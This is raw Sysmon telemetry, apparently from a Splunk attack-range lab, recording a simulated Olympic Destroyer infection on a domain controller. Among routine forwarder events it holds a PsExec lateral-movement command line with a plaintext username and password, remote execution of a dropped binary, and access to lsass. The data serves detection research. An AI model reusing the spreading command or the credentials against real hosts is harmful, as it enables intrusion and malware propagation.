10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217688Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217687Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-12EF-6216-8404-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217686Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.901{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12EF-6216-8404-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217685Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.902{4F8D34B0-12EF-6216-8404-000000003902}3548C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000217684Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:45.567{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51411-false10.0.1.12-8089- 10341000x8000000000000000217683Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.386{4F8D34B0-12EF-6216-8304-000000003902}35322364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217682Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.292{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B0654CD8D579DB935B1E3485E1BE837,SHA256=7AA9BB5FCDF15207035BD7F8271EC45C4F6ACC24DBD8343C73A601356A0D555D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.276{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51101- 10341000x8000000000000000291312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.931{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8E05-000000003802}6408C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.931{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8E05-000000003802}6408C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.914{C8EA50B7-12EF-6216-8E05-000000003802}64086440C:\Windows\system32\conhost.exe{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.899{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8E05-000000003802}6408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.883{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8E05-000000003802}6408C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x8000000000000000291307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.290{C8EA50B7-F11F-6215-1300-000000003802}616igmp.mcast.net0224.0.0.22;C:\Windows\System32\svchost.exe 22542200x8000000000000000291306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:45.286{C8EA50B7-F11F-6215-1300-000000003802}616ip-10-0-1-12.eu-central-1.compute.internal010.0.1.12;C:\Windows\System32\svchost.exe 23542300x8000000000000000291305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4F933B74040EEAC66B4BC86B87B72B9,SHA256=3445FE9E6BDE235E8866152C6CE726E7A34B9B7DD02A517F43E10463A0D7A259,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.799{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF2248ED18392000081D02C126AEFA0,SHA256=65A9019C6E09EB2E36EBF9B809E00BB15BBFDC7F8AB73A86F23D55D114804767,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.770{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8D05-000000003802}5288C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000291295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.767{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000291294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.745{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.745{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000291292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:47.714{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000291291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.683{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8C05-000000003802}5708C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.683{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EF-6216-8C05-000000003802}5708C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.667{C8EA50B7-12EF-6216-8C05-000000003802}57087108C:\Windows\system32\conhost.exe{C8EA50B7-12EF-6216-8B05-000000003802}3364C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.644{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-12EF-6216-8C05-000000003802}5708C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.644{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EF-6216-8C05-000000003802}5708C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:47.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 